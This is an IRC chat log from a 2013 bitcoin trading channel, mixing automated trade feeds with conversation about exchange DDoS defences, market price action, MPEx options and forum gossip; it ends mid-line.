ssl Mar 30 01:36:42 but since your auth is changing the same way as their client Mar 30 01:36:48 you can always connect Mar 30 01:37:32 the ddos coinbr saw would have no problem penetrating all 65535 ports Mar 30 01:37:45 hmm what good is a different port if your upstream connection is saturated ? Mar 30 01:37:53 good points Mar 30 01:38:23 [BTCTC] [B.YABMC] 1 @ 0.007601 BTC [-] Mar 30 01:38:30 MJR_III understand, ddos threat is not to cpu Mar 30 01:38:34 it's to the routers. Mar 30 01:38:41 yes Mar 30 01:38:47 thats what you were telling me Mar 30 01:39:56 using various IP addresses instead of port may work Mar 30 01:40:17 but you still need to expose some stable anchor where users authenticate Mar 30 01:40:37 i still think that you could use the yubikey method Mar 30 01:40:39 and get the ip Mar 30 01:41:22 but we also need someone to do it properly << i'm with him Mar 30 01:41:34 hmmm... maybe create DNS entry .domain.com seems doable? Mar 30 01:41:35 ppcoin sounds more like "what does this button do" than anything. Mar 30 01:41:49 [BTCTC] [ASICMINER-PT] 2 @ 0.787948 = 1.5759 BTC [+] Mar 30 01:42:33 often they float <10% of there shares and often aren't that liquid <<< /me grins Mar 30 01:43:10 jurov yeah that is what i was thinking Mar 30 01:43:13 nothing to stop the dosser getting the ip, well 30btc, unless each user has a differnt ip/isp Mar 30 01:43:14 [MPEX] [S.DICE] 3 @ 0.0039999 = 0.012 BTC [+] Mar 30 01:43:16 a token based system Mar 30 01:43:37 how would he get the token? Mar 30 01:43:43 yes you need a pool of ips Mar 30 01:43:46 only registered users would get it Mar 30 01:43:57 and yes, a pool of ips, but that shouldn't be that hard Mar 30 01:44:18 yubikey creates a pseudorandom string and you know what the strign is going to be, no? Mar 30 01:44:30 yes Mar 30 01:44:30 as you issued the yubikey Mar 30 01:44:40 pool of IPs on different AS, that is expensive, at least you can shut the account down :) Mar 30 01:44:46 and it changes every 20 seconds according to a pattern that only you can tell] Mar 30 01:45:18 bah, it can be just a bunch of spot instances or cheap vpses Mar 30 01:45:22 i guess it would be similar to the one time password that gribble does Mar 30 01:45:42 exactly, its just a simple authenticator which serves as a gatekeeper before you connect Mar 30 01:45:56 'bunch of spot instances or cheap vpses' all on same router for dos to target Mar 30 01:46:19 myeah. Mar 30 01:46:29 can't you split them up? Mar 30 01:46:36 expensive Mar 30 01:46:37 Troic, on amazon you can have the instances on like 10 diff places Mar 30 01:46:41 AWS instances in different zones? Mar 30 01:46:46 MJR_III this is what was going on back during ddos Mar 30 01:46:48 for almost the same price, yes Mar 30 01:46:56 some ninny actually took the time to blow them up one at a time Mar 30 01:46:59 10 customers Mar 30 01:48:10 mircea_popescu cuz you didn't use amazon loadbalancer... granted, with 10TB traffic it would get a bit expensive :) Mar 30 01:48:28 jurov they were cheap vps's etc Mar 30 01:48:33 i thought htat's what we were disucssing Mar 30 01:48:40 what is the cost of a ddos of that magnitude? Mar 30 01:49:01 siiignificant. Mar 30 01:49:25 yes we were talink about that, but after experimenting i realized hiding these cheap vpses behind loadbalancer is the way to go Mar 30 01:49:33 *talking Mar 30 01:49:38 i hear 1gbit for 30 seconds is like 5-10 bux for random noob. Mar 30 01:49:42 10 terabytes? that has got to cost quite a bit Mar 30 01:50:13 10TB is around 300bux iirc Mar 30 01:50:18 for a lb Mar 30 01:50:25 per how long? Mar 30 01:50:31 total Mar 30 01:50:35 accoumulated Mar 30 01:50:43 that is pretty cheap Mar 30 01:50:44 10 tb = 1000 seconds of 10 gbit Mar 30 01:51:25 thre's maybe hope they are onyl counting legit traffic that ges through Mar 30 01:51:33 not syn flood Mar 30 01:51:55 i should research it Mar 30 01:53:03 possibly ya Mar 30 01:53:12 but so was i. Mar 30 01:53:19 synflood is like, 14 bytes per packet ? Mar 30 01:53:41 $0.008 per GB of data processed by an Elastic Load Balancer, no further details Mar 30 01:54:05 plus $0.025 per Elastic Load Balancer-hour (or partial hour) Mar 30 01:54:31 not too bad Mar 30 01:54:41 you could bring it up when the attack starts Mar 30 01:55:07 and i think you would be blocking their expensive attack with a cheap shield Mar 30 01:59:58 [HAVELOCK] [VTX] 10 @ 0.48 = 4.8 BTC [+] Mar 30 02:00:15 what do you guys think? up/down? Mar 30 02:00:35 I'm still bearish short term, this retracement isn't over Mar 30 02:01:59 think we are somewhat stablising Mar 30 02:02:09 i think we bounce between 92 and 88 Mar 30 02:02:22 maybe if gox lag gets bad quick spikes in either direction Mar 30 02:02:59 mircea_popescu: so what is cloudflare actually doing for bitfinex Mar 30 02:03:04 i can't use their website Mar 30 02:03:24 i dunno who was asking me about ddos protection services and i said they all have their issues Mar 30 02:03:35 this'd be an example. Mar 30 02:03:40 bitfinex would work better if they would deploy on a more solid exchange Mar 30 02:03:43 like bitfloor Mar 30 02:03:48 i agree Mar 30 02:04:03 bitfloor has the best response time i think Mar 30 02:04:30 yea, its the least worst exchange i've seen Mar 30 02:04:35 lol Mar 30 02:04:39 wish there was a better order interface Mar 30 02:04:43 but what can you do Mar 30 02:04:46 okay mpex is the pinnacle, but for btcusd Mar 30 02:04:49 also margin and shorting would be nice Mar 30 02:04:53 well of course Mar 30 02:04:54 mircea_popescu: options did exercise but old names still stayed Mar 30 02:05:02 or it's scheduled for later? Mar 30 02:05:13 yeah. Mar 30 02:05:18 also...roman told me that he could handle 2k orders per second Mar 30 02:06:33 :O Mar 30 02:07:11 mircea_popescu: so if its the router...if it just drops all but a certain subset of traffic, can it still be overloaded? Mar 30 02:07:41 MJR_III yes. Mar 30 02:11:25 mircea_popescu: so there is unblockable ddos? Mar 30 02:11:55 yes. Mar 30 02:12:01 ;;bc,24hprc Mar 30 02:12:02 89.55 Mar 30 02:12:23 if they flooded with fully legit gpg-encypted requests for example Mar 30 02:12:34 interesting Mar 30 02:12:38 i dont think there is such a thing MJR Mar 30 02:12:52 KRS1: a purely hardware overload Mar 30 02:12:53 you can filter it through a proxy Mar 30 02:13:09 thats what my friend does for a living..he mitigates attacks Mar 30 02:13:11 KRS1: if the proxy is overloaded Mar 30 02:13:21 http://www.foxnews.com/tech/2013/03/29/digital-currency-bitcoin-surpasses-20-national-currencies-in-value/ Mar 30 02:13:24 i know a bit about it being in IT but i'm not an expert in that area Mar 30 02:13:53 well, i think every piece of hardware will have a limit Mar 30 02:13:57 and this is just theorizing Mar 30 02:14:19 but if any piece is overloaded (it could restart, or have its buffers flooded) you break the site Mar 30 02:14:30 the proxy typically is equipped for the traffic and then its filtered and sent to the customer Mar 30 02:14:39 no i understand Mar 30 02:14:49 mircea was talking about terabytes of data Mar 30 02:17:18 the idea is that if you cant accept the traffic something needs to accept it for you that cant be overwhelmed Mar 30 02:17:34 even for terabytes of data Mar 30 02:18:33 but my point is that as far as i know there is no device with unlimited capacity Mar 30 02:18:37 thats right Mar 30 02:18:40 how many hours til newstyle options might be released? Mar 30 02:18:41 you scale it Mar 30 02:18:48 with additional hardware Mar 30 02:18:59 so if you had a 100gb router (they exist) it could still be brought down Mar 30 02:19:46 sure why not...any distributed effort can be bigger than its target. Mar 30 02:19:51 true Mar 30 02:20:10 of course you probbably donb't need to stop theoretical attacks just make it impractical Mar 30 02:20:18 hopefully you have something that can accept the traffic that can handle it Mar 30 02:20:24 yes true Mar 30 02:20:34 but for example, i am setting up an stunnel to bitfloor Mar 30 02:20:50 so worst case if the site goes down, that should not bring down my stunnel Mar 30 02:21:24 [BTCTC] [GSDPT] 14 @ 0.00385 = 0.0539 BTC [-] Mar 30 02:21:27 [BTCTC] [GSDPT] 20 @ 0.00381 = 0.0762 BTC [-] Mar 30 02:21:36 so for an institutional client, some sort of vpn on dedicated hardware is probably best Mar 30 02:21:50 encryption adds a lot of overhead Mar 30 02:21:57 i think i see what you are saying Mar 30 02:22:00 what would be the target though Mar 30 02:22:26 right Mar 30 02:22:40 hopefully multiples that can failover if need be Mar 30 02:23:03 good point Mar 30 02:23:11 the cisco ASA can vpn too Mar 30 02:23:18 yep Mar 30 02:23:22 that is what we have lol Mar 30 02:23:31 and 6509's 2 of them VSS'd Mar 30 02:23:36 nice Mar 30 02:24:01 dont forget about bandwidth when setting up stunnel, encryption adds overhead Mar 30 02:24:08 dns..etc. Mar 30 02:24:45 its ture Mar 30 02:24:48 true Mar 30 02:25:45 hmmm, what is the best router out there? Mar 30 02:25:52 i'm just curious Mar 30 02:26:30 the asa is actually a firewall right Mar 30 02:26:58 [HAVELOCK] [HIM] 2 @ 1.895 = 3.79 BTC [+] Mar 30 02:28:03 juniper makes some nice stuff Mar 30 02:28:58 fuck when i finally got back on bitfinex i am greeted by the position i didn't know i had Mar 30 02:29:33 lol Mar 30 02:29:59 it actually is not that bad of a position though...short at 90.50 Mar 30 02:32:00 mircea used vwap 90.34 ??? quite a boost we got there :P Mar 30 02:34:30 i exercised at 71, what a sucker i am Mar 30 02:37:41 that was awesome, my local pizza place delivered me cigarettes Mar 30 02:38:40 yea asa is awesome Mar 30 02:39:05 i wonder...how will ipv6 change the DDOS landscape Mar 30 02:39:10 router-depends on what you use it for Mar 30 02:39:18 cisco 7000 series Mar 30 02:39:22 :) Mar 30 02:39:23 ipv6 is just a transport mechanism not sure it would matter Mar 30 02:39:35 you could have a MUCH greater address pool Mar 30 02:39:41 sorry i mean addressing method Mar 30 02:39:44 and also you wouldn't have to worry about NATing Mar 30 02:39:57 which can be a bottleneck Mar 30 02:40:10 yeah ipv6 would increase the # of ddos participants against the target if you could ever get there Mar 30 02:40:16 good point Mar 30 02:40:18 router- depending on the application Mar 30 02:40:59 voip traffic, etc Mar 30 02:41:41 mircea_popescu: financials up yet? Mar 30 02:41:52 tcp\ip = cisco i think Mar 30 02:41:57 vs udp etc Mar 30 02:41:59 i mean Mar 30 02:42:11 lol certain lucky coinbr user made 4 btc out of one using calls (not tibby obviously) Mar 30 02:42:34 wow what did he have? Mar 30 02:42:39 41 calls is what i got Mar 30 02:42:56 thestringpuller don't be impatient :) Mar 30 02:43:03 bbl Mar 30 02:46:00 http://trilema.com/2013/mpoe-march-2013-statement/ Mar 30 02:46:02 ok tghere it is. Mar 30 02:46:40 hmm, that's not ideal Mar 30 02:48:44 so all the bonds that went below 100BTC will be paid out automatically or we need to ask? Mar 30 02:48:57 [BTCTC] [S.MPOE-PT] 700 @ 0.000617 = 0.4319 BTC [-] Mar 30 02:49:00 [BTCTC] [S.MPOE-PT] 120 @ 0.000616 = 0.0739 BTC [-] Mar 30 02:49:48 jurov they get paid. Mar 30 02:50:02 i forgot the red lines Mar 30 02:55:18 mircea_popescu: and why so high vwap got used? did it really fell from 90.34 to 89.55 in 10 minutes? Mar 30 03:00:13 actually i see it 91.05 atm ? Mar 30 03:01:16 ;;bc,24hprc Mar 30 03:01:18 89.53 Mar 30 03:01:21 where? Mar 30 03:02:17 http://www.bitcoincharts.com/markets/currencies/ lists 89.53 too Mar 30 03:02:41 hm Mar 30 03:03:39 i dont like this price action one bit Mar 30 03:05:38 there's a lot of volume right at the edge of the rolling window Mar 30 03:07:08 wow mircea_popescu, that did make me nauseous Mar 30 03:07:17 mircea_popescu: where is dat post Mar 30 03:07:23 lolol Mar 30 03:07:27 myeah Mar 30 03:15:57 [HAVELOCK] [SDICE] 1 @ 0.4 BTC [-] Mar 30 03:16:56 [HAVELOCK] [SDICE] 1 @ 0.4199 BTC [+] Mar 30 03:21:16 https://bitcointalk.org/index.php?topic=131270.msg1702603#msg1702603 Mar 30 03:21:27 converted even bad news into sales pitch... Mar 30 03:23:00 we all knew the bot was going to beat like rodney king Mar 30 03:23:23 but why did bugpowder think that would affect dividends Mar 30 03:23:24 just a one month deal Mar 30 03:23:42 sorry mp.rough month Mar 30 03:25:48 mpex.co now looks so easily comprehensive, all options gone Mar 30 03:31:30 nice Mar 30 03:32:24 bitfinex sucks, they don't actually send orders out, but whatever engine they have doesn't send them out quickly enough, which partially gox's fault Mar 30 03:32:35 it traded down to 87 without me getting filled Mar 30 03:32:57 [HAVELOCK] [SDICE] 10 @ 0.4 = 4 BTC [-] Mar 30 03:34:29 20 to 200 with step 3 planned? we'll have 244 new options then... Mar 30 03:35:40 wouldn't it be 90 puts and 90 calls for each month? Mar 30 03:36:19 no, 61 puts and 61 calls Mar 30 03:36:31 if i'm to believe this oocalc thing Mar 30 03:36:47 180/3 Mar 30 03:36:57 [HAVELOCK] [SDICE] 50 @ 0.4 = 20 BTC [-] Mar 30 03:36:58 [HAVELOCK] [SDICE] 30 @ 0.4 = 12 BTC [-] Mar 30 03:37:04 i thought Mar 30 03:37:20 180/3=60 lol Mar 30 03:37:30 lol, thats why i should use gribble Mar 30 03:38:57 [HAVELOCK] [SDICE] 40 @ 0.4 = 16 BTC [-] Mar 30 03:39:20 C750 to be upgraded to C77, yum Mar 30 03:39:32 looking forward to sdice financials this month Mar 30 03:41:32 jurov: isn't that downgraded? Mar 30 03:41:38 lol Mar 30 03:42:09 unless you were short i suppose Mar 30 03:42:22 you're right :) Mar 30 03:42:27 but if i was long that call i would have rather gone to 74 Mar 30 03:49:18 oh, lol, that went well Mar 30 03:49:53 BUY|O.USD.C920T|7|11344696 <<< does that look wrong to anyone :D Mar 30 03:50:11 no because I have no clue wtf it says Mar 30 03:50:11 that looks VERY bullish Mar 30 03:50:55 Diablo-D3: smickles wants option to buy 7 BTC at $920 each :) Mar 30 03:50:56 [HAVELOCK] [SDICE] 1 @ 0.4 BTC [-] Mar 30 03:51:26 at measly 1.134 per option Mar 30 03:51:31 ;;calc 920/(1-.1134) Mar 30 03:51:32 1037.67200541 Mar 30 03:51:42 nice b/e point Mar 30 03:51:57 jurov: I like the cut of his jib Mar 30 03:52:56 [HAVELOCK] [SDICE] 2 @ 0.4 = 0.8 BTC [-] Mar 30 03:52:58 [HAVELOCK] [SDICE] 2 @ 0.4 = 0.8 BTC [-] Mar 30 03:53:10 !ticker h sdice Mar 30 03:53:13 [HAVELOCK:SDICE] 1D: 0.35000000 / 0.41321889 / 0.46500000 (457 shares, 188.84103088 BTC), 7D: 0.35000000 / 0.45346676 / 0.53000000 (1701 shares, 771.34695284 BTC), 30D: 0.35000000 / 0.5143263 / 0.68950000 (6033 shares, 3102.93054732 BTC) Mar 30 03:54:37 lololq Mar 30 03:55:30 bfl asics doesn't hash lol Mar 30 03:56:10 but I bought a bowl and everything :< Mar 30 03:57:17 TradeFortress: really? Mar 30 03:57:58 MJR_III: https://www.youtube.com/watch?v=4C4bgho5JSI Mar 30 03:59:39 would it be fun to have an open cry pit for bitcoins? Mar 30 03:59:44 i think it would be Mar 30 04:01:00 [MPEX] [S.MPOE] 3600 @ 0.00067327 = 2.4238 BTC [+] Mar 30 04:01:46 i mostly want to do it for the cool jackets... Mar 30 04:04:32 ok, what's wrong with BUY|O.USD.C89T|7|12279228 ? Mar 30 04:05:03 what the Mar 30 04:05:21 smickles 089 Mar 30 04:05:39 mircea_popescu: why does it show on mpex.co as C89T? Mar 30 04:05:59 so : the mpsic change is complete. if you had N's that were realocated they should show up. Mar 30 04:06:02 bot is quoting. Mar 30 04:06:13 the entire thing is trading under supervision and stuff may be rolled back if there's issues. Mar 30 04:06:17 oh, it just changed Mar 30 04:06:19 go ahead and test. Mar 30 04:06:38 and multiply Mar 30 04:07:00 thats a lot of options :D Mar 30 04:09:22 :p Mar 30 04:10:42 what do you think mircea_popescu, trading jackets and open cry pit? Mar 30 04:10:50 plus the hand signals look cool Mar 30 04:10:51 can't hurt. Mar 30 04:11:11 its so anachronistic Mar 30 04:12:33 [BTCTC] [ASICMINER-PT] 5 @ 0.78791 = 3.9396 BTC [-] Mar 30 04:12:36 [BTCTC] [ASICMINER-PT] 3 @ 0.787948 = 2.3638 BTC [+] Mar 30 04:12:40 [BTCTC] [ASICMINER-PT] 1 @ 0.78795 BTC [+] Mar 30 04:12:45 [BTCTC] [ASICMINER-PT] 1 @ 0.788 BTC [+] Mar 30 04:12:48 [BTCTC] [ASICMINER-PT] 10 @ 0.78895 = 7.8895 BTC [+] Mar 30 04:13:37 mircea_popescu: that was the saddest financial report ever Mar 30 04:13:39 oh sick bids @ mtgox Mar 30 04:14:03 myeah Mar 30 04:14:46 ;;asks 94 Mar 30 04:14:47 There are currently 8425.506 bitcoins offered at or under 94.0 USD, worth 779353.416378 USD in total. | Data vintage: 72.7984 seconds Mar 30 04:21:14 ;;seen smickles Mar 30 04:21:14 smickles was last seen in #bitcoin-assets 14 minutes and 57 seconds ago: oh, it just changed Mar 30 04:22:43 ;;bids 85 Mar 30 04:22:45 it traded down to 87 without me getting filled << usually the sign of bucket shoppery. Mar 30 04:22:45 There are currently 16363.067 bitcoins demanded at or over 85.0 USD, worth 1467808.69682 USD in total. | Data vintage: 0.0052 seconds Mar 30 04:23:03 damn that is a wall... Mar 30 04:23:11 ;;bids 75 Mar 30 04:23:11 There are currently 46099.881 bitcoins demanded at or over 75.0 USD, worth 3796776.10301 USD in total. | Data vintage: 26.1647 seconds Mar 30 04:23:23 C750 to be upgraded to C77, yum << you mean 74 ? Mar 30 04:23:33 10k coins at 92 Mar 30 04:23:45 yes i stand corrected Mar 30 04:24:36 i'll be damned... everything seems in order ? Mar 30 04:25:17 here comes another spike Mar 30 04:25:42 that is a huge ass wall at 92 Mar 30 04:25:54 yes sir Mar 30 04:25:57 10k Mar 30 04:26:37 bot is quoting correctly and everything. cool beans. Mar 30 04:26:41 this movie is pretty fun to watch Mar 30 04:26:44 The Pit Mar 30 04:26:46 10k and growin, like 13k now... bull trap maybe? get people to place bids at 92, then crash market? :) Mar 30 04:26:59 i think so Mar 30 04:27:02 i'm short at 92 Mar 30 04:27:10 i might have lost 15k rthis month, but on the upside who the duck else has monthly report and whole mpsic changeover in 2 hours ? Mar 30 04:27:19 fucking worth a million and a half i tell you Mar 30 04:27:25 mircea_popescu yes, nice transition Mar 30 04:30:20 this is the most interesting thing about trading, is that for every trade there is someone else on the other side Mar 30 04:30:27 and i think economics forgets that at times Mar 30 04:30:57 and people who trade with each other a lot, its like your win can be their loss Mar 30 04:31:20 lift off and wall at 17k lol Mar 30 04:31:47 yeah looks like we are headed to 94 for sure Mar 30 04:31:48 shh Chaang-Noi Mar 30 04:32:03 lol, like im going to scare the bulls :) Mar 30 04:33:16 we might get 100 before april after all Mar 30 04:33:26 ;;asks 100 Mar 30 04:33:26 There are currently 23844.076 bitcoins offered at or under 100.0 USD, worth 2309880.5722 USD in total. | Data vintage: 63.0708 seconds Mar 30 04:33:34 hmmm Mar 30 04:36:42 asic miner, too many rich holders eh? well lets wait for the 260 ghs :) Mar 30 04:40:11 [MPEX] [S.MPOE] 2282 @ 0.00066531 = 1.5182 BTC [-] Mar 30 04:40:13 [MPEX] [S.MPOE] 6068 @ 0.00066529 = 4.037 BTC [-] Mar 30 04:40:50 [MPEX] [O.USD.C098T] 230 @ 0.22099114 = 50.828 BTC Mar 30 04:41:12 !ticker m ^oix Mar 30 04:41:13 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 66.95953589 / 85.06143152 / 85.06556611 (111084 shares, 22,108.25 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 30 04:41:20 hi pigeons Mar 30 04:42:08 hmmm Mar 30 04:42:09 MJR_III: coinbr should be done too Mar 30 04:42:12 104 calls look nice Mar 30 04:42:23 [MPEX] [O.USD.P050T] 8 @ 0.0157744 = 0.1262 BTC Mar 30 04:44:02 jurov: have we gotten divs yet? Mar 30 04:44:49 s.mpoe hasn't paid yet Mar 30 04:44:58 ;;bc,24hprc Mar 30 04:45:00 89.91 Mar 30 04:46:47 https://bitcointalk.org/index.php?topic=131270.msg1558393#msg1558393 Mar 30 04:46:51 o wow look at all the detective work Mar 30 04:47:49 oh yes, i must tell to deprived they weren't in order Mar 30 04:48:06 jurov, nice avatar Mar 30 04:48:46 i take it you are a recipient of the double cherry truck award? Mar 30 04:49:17 yea, i have drawn it and awarded mpex. got 5btc in return :) Mar 30 04:49:32 very nice Mar 30 04:50:11 the contest: https://bitcointalk.org/index.php?topic=122881.0 Mar 30 04:50:25 in memory of Patrick Harnett Mar 30 04:51:22 lol yea Mar 30 04:51:40 jurov : if you have any artist friends you can always troll them Mar 30 04:51:48 by pointing out that they don't ger 500 bux for a vignette Mar 30 04:52:32 [BTCTC] [B.YABMC] 1 @ 0.01449 BTC [+] Mar 30 04:52:36 lets see that wall disappear Mar 30 04:52:51 [BTCTC] [B.YABMC] 1 @ 0.0145 BTC [+] Mar 30 04:53:12 [BTCTC] [B.YABMC] 1 @ 0.016 BTC [+] Mar 30 04:53:31 [BTCTC] [B.YABMC] 1 @ 0.017 BTC [+] Mar 30 04:53:50 [BTCTC] [B.YABMC] 1 @ 0.019 BTC [+] Mar 30 04:53:59 yea. that was actually second time i won some such contest Mar 30 04:54:20 [BTCTC] [B.YABMC] 11 @ 0.01966 = 0.2163 BTC [+] Mar 30 04:54:59 so, did you transfer rights to the double cherry truck award to mpex, or do you retain the rights to award said trophy Mar 30 04:56:17 i retain all rights! Mar 30 04:56:20 and priviledges Mar 30 04:56:26 MJR_III: i guess once btc will rise enough, i can find lawyer to pick the case pro bono Mar 30 04:56:28 ah Mar 30 04:56:34 :D Mar 30 04:56:48 ooh and also received payout, that was quick: http://bitbet.us/bet/3/mpbor-over-10-in-q1/?ref=1EteoRKNYbNhhmFfsKnUSWRF3JUpKCcMnc Mar 30 04:57:07 i think that award will be worth a lot in the future...i would like to be a recipient of the double cherry truck award, but i think that the moody's triple a rating will be slightly smoky dragon Mar 30 04:58:16 haha Mar 30 04:58:34 i'm gonna have to come up with criteria to award these now Mar 30 04:58:44 yep Mar 30 04:59:15 and i'll be awarding ravaging mermaid Mar 30 04:59:33 NICE Mar 30 04:59:39 i do like the mermaid Mar 30 04:59:54 fuck, what to watch next Mar 30 05:00:07 kakobrekla: you should make banners with rotating bets and put them on reddit, some bet fall quickly into obscurity Mar 30 05:00:47 especially some i'd like to bet moar Mar 30 05:04:44 large drama on bitcoin talk = large bets Mar 30 05:04:59 a company to profit off of bitcoin drama, best idea evar Mar 30 05:05:34 Chaang-Noi: have you seen the one "bitcointalk treasurer to be scammer tagged"? Mar 30 05:05:51 yeah Mar 30 05:05:57 i expect Og to be the scammer of the group Mar 30 05:06:05 i forget the otehrs Mar 30 05:06:22 also dont forget theymos is the guy who hands out tags:) Mar 30 05:09:56 wait. og as in, the ognasty club guy ? Mar 30 05:11:28 yeah, i dont trust him Mar 30 05:12:09 m-i-c Mar 30 05:12:16 k-e-y Mar 30 05:12:23 o this can't possibly end well. Mar 30 05:12:31 where's that bet again ? Mar 30 05:15:08 mp, do mpex PR lackeys get an @mpex.co email addy? Mar 30 05:15:47 lol Mar 30 05:15:49 could use email addy's as referral system Mar 30 05:16:19 um Mar 30 05:16:31 i'd hope they have their own email >< Mar 30 05:16:41 o also, someone be kind enough to put march report on reddit ? Mar 30 05:16:58 curious what the derpcrowd does Mar 30 05:17:01 theymos still has you banned? Mar 30 05:18:25 um Mar 30 05:18:36 i have no idea tbh Mar 30 05:21:56 who put up that wall and to what end? Mar 30 05:27:46 want has btc or want has btc price move up? Mar 30 05:27:58 ;;ticker Mar 30 05:27:58 BTCUSD ticker | Best bid: 92.52001, Best ask: 92.74995, Bid-ask spread: 0.22994, Last trade: 92.74995, 24 hour volume: 73187.25009339, 24 hour low: 85.50000, 24 hour high: 94.00000, 24 hour vwap: 90.09023 Mar 30 05:28:34 two 1000 btc sell orders fell into it Mar 30 05:28:36 its a real wall Mar 30 05:31:27 hmmm Mar 30 05:31:31 interesting Mar 30 05:31:37 well, we are digging in Mar 30 05:32:02 [BTCTC] [S.MPOE-PT] 47 @ 0.000607 = 0.0285 BTC [-] Mar 30 05:37:52 [BTCTC] [ASICMINER-PT] 3 @ 0.797793 = 2.3934 BTC [+] Mar 30 05:39:41 ;;calc 91.77*1.2 Mar 30 05:39:41 110.124 Mar 30 05:40:45 ;;bids 0 Mar 30 05:40:48 There are currently 34671020 bitcoins demanded at or over 0.0 USD, worth 10482734.1184 USD in total. | Data vintage: 0.0176 seconds Mar 30 05:41:11 waitll bug sees that Mar 30 05:42:53 [BTCTC] [ASICMINER-PT] 9 @ 0.797794 = 7.1801 BTC [+] Mar 30 05:42:57 ;;asks 99.91 Mar 30 05:42:59 There are currently 18564.837 bitcoins offered at or under 99.91 USD, worth 1797672.6472 USD in total. | Data vintage: 0.0022 seconds Mar 30 05:43:24 ;;bids 85 Mar 30 05:43:24 There are currently 20005.793 bitcoins demanded at or over 85.0 USD, worth 1792948.69182 USD in total. | Data vintage: 25.0206 seconds **** BEGIN LOGGING AT Sat Mar 30 12:23:34 2013 Mar 30 12:23:56 [BTCTC] [BASIC-MINING] 1 @ 0.3451 BTC [-] Mar 30 12:24:52 [BTCTC] [ASICMINER-PT] 1 @ 0.8 BTC [+] Mar 30 12:33:04 [HAVELOCK] [SDICE] 1 @ 0.38000001 BTC [-] Mar 30 12:34:02 [HAVELOCK] [HIM] 1 @ 1.88 BTC [-] Mar 30 12:34:32 ;;bc,stats Mar 30 12:34:40 Current Blocks: 228740 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 1083 blocks | Next Difficulty In About: 6 days, 2 hours, 50 minutes, and 50 seconds | Next Difficulty Estimate: 7311735.07761 | Estimated Percent Change: 9.1984 Mar 30 12:42:45 [BTCTC] [ASICMINER-PT] 4 @ 0.8 = 3.2 BTC [+] Mar 30 12:53:11 [BTCTC] [ASICMINER-PT] 1 @ 0.79 BTC [-] Mar 30 12:53:48 [BTCTC] [ASICMINER-PT] 1 @ 0.78 BTC [-] Mar 30 12:54:20 [BTCTC] [ASICMINER-PT] 1 @ 0.771 BTC [-] Mar 30 12:55:10 [BTCTC] [ASICMINER-PT] 5 @ 0.77 = 3.85 BTC [-] Mar 30 12:56:33 ;;ticker Mar 30 12:56:34 BTCUSD ticker | Best bid: 91.30001, Best ask: 91.98999, Bid-ask spread: 0.68998, Last trade: 91.30000, 24 hour volume: 68373.91210877, 24 hour low: 85.50000, 24 hour high: 94.98000, 24 hour vwap: 90.17684 Mar 30 13:05:04 [MPEX] [S.MPOE] 2200 @ 0.00066394 = 1.4607 BTC [-] Mar 30 13:18:21 [MPEX] [S.MPOE] 7868 @ 0.00066409 = 5.2251 BTC [+] Mar 30 13:18:23 [MPEX] [S.MPOE] 1347 @ 0.00067673 = 0.9116 BTC [+] Mar 30 13:18:25 [MPEX] [S.MPOE] 36 @ 0.00067674 = 0.0244 BTC [+] Mar 30 13:44:54 [BTCTC] [BASIC-MINING] 3 @ 0.37 = 1.11 BTC [+] Mar 30 13:47:24 [BTCTC] [COGNITIVE] 7 @ 0.1565 = 1.0955 BTC [+] Mar 30 13:59:07 [BTCTC] [ASICMINER-PT] 2 @ 0.8 = 1.6 BTC [+] Mar 30 14:10:58 [BTCTC] [BASIC-MINING] 2 @ 0.37 = 0.74 BTC [+] Mar 30 14:13:23 [BTCTC] [S.BBET-PT] 10 @ 0.00158 = 0.0158 BTC [+] Mar 30 14:24:42 [MPEX] [S.MPOE] 18664 @ 0.00067674 = 12.6307 BTC [+] Mar 30 14:34:03 [HAVELOCK] [VTX] 1 @ 0.485 BTC [+] Mar 30 14:34:35 so it turns out strongcoin was indeed fucked. Mar 30 14:36:55 [BTCTC] [GSDPT] 20 @ 0.00399 = 0.0798 BTC [-] Mar 30 14:38:29 13:37.17 ( idioterna ) bitstamp guy Mar 30 14:38:29 13:37.18 ( idioterna ) http://us3.na.apcdn.com/full/98938.gif Mar 30 14:41:14 lol Mar 30 14:43:18 [BTCTC] [PAJKA.BOND] 1 @ 0.1059 BTC [+] Mar 30 14:50:50 [MPEX] [O.USD.C092T] 600 @ 0.24766633 = 148.5998 BTC Mar 30 14:53:00 [MPEX] [S.MPOE] 936 @ 0.00067685 = 0.6335 BTC [+] Mar 30 14:53:02 [MPEX] [S.MPOE] 1214 @ 0.00066805 = 0.811 BTC [-] Mar 30 15:13:23 [MPEX] [S.MPOE] 5901 @ 0.00067952 = 4.0098 BTC [+] Mar 30 15:13:24 [MPEX] [S.MPOE] 299 @ 0.00067955 = 0.2032 BTC [+] Mar 30 15:18:28 [MPEX] [S.MPOE] 7586 @ 0.00066805 = 5.0678 BTC [-] Mar 30 15:18:30 [MPEX] [S.MPOE] 912 @ 0.00066394 = 0.6055 BTC [-] Mar 30 15:23:21 [BTCTC] [ASICMINER-PT] 1 @ 0.81 BTC [+] Mar 30 15:23:25 [BTCTC] [ASICMINER-PT] 2 @ 0.8 = 1.6 BTC [-] Mar 30 15:24:04 [HAVELOCK] [VTX] 1 @ 0.485 BTC [+] Mar 30 15:25:21 [MPEX] [S.MPOE] 25400 @ 0.00067955 = 17.2606 BTC [+] Mar 30 15:31:03 [BTCTC] [ASICMINER-PT] 22 @ 0.8 = 17.6 BTC [-] Mar 30 15:32:46 [BTCTC] [BASIC-MINING] 1 @ 0.37 BTC [+] Mar 30 15:33:37 [MPEX] [S.MPOE] [PAID] 196.89044015 BTC to 500`000`000 shares, 39 satoshi per share Mar 30 15:38:47 [BTCTC] [BASIC-MINING] 2 @ 0.37 = 0.74 BTC [+] Mar 30 15:43:28 Hello! Mar 30 15:44:02 is there any sort of stock market for BTC? other than MPEx which costs 30BTC to join Mar 30 15:47:46 there a several Mar 30 15:47:56 sec Mar 30 15:47:56 such as... Mar 30 15:47:58 ok thanks! Mar 30 15:48:03 www.bitfunder.com Mar 30 15:48:08 www.btct.co Mar 30 15:48:17 www.litecoinglobal.com Mar 30 15:48:24 [MPEX] [S.MPOE] 5000 @ 0.00067953 = 3.3977 BTC [-] Mar 30 15:48:25 [MPEX] [S.MPOE] 37 @ 0.00067955 = 0.0251 BTC [+] Mar 30 15:48:27 [MPEX] [S.MPOE] 2863 @ 0.00067955 = 1.9456 BTC [+] Mar 30 15:48:29 do you use either one? Mar 30 15:48:35 https://coinbr.com/ref?c=Q9gPSuUvYS Mar 30 